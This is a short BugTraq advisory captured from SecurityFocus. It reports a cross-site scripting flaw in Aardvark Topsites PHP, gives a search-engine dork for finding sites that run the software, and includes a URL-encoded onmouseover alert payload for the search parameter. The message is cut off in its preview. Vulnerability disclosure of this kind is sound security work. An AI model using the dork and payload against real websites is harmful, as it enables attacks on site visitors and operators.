BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Aardvark Topsite XSS vulnerability Oct 24 2010 04:13PM
Yam Mesicka (yammesicka gmail com)
Hi,

I found XSS on Aardvark Topsites PHP system.
Dork: "Powered by Aardvark Topsites" "SQL Queries"
XSS PoC: site_path/index.php?a=search&q=%22%20onmouseover%3dalert(String.fromChar
Code(88,83,83))%20par%3d%22
Can use POST to effect the "email", "title", "u" and "url" parameters
either on the same w...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus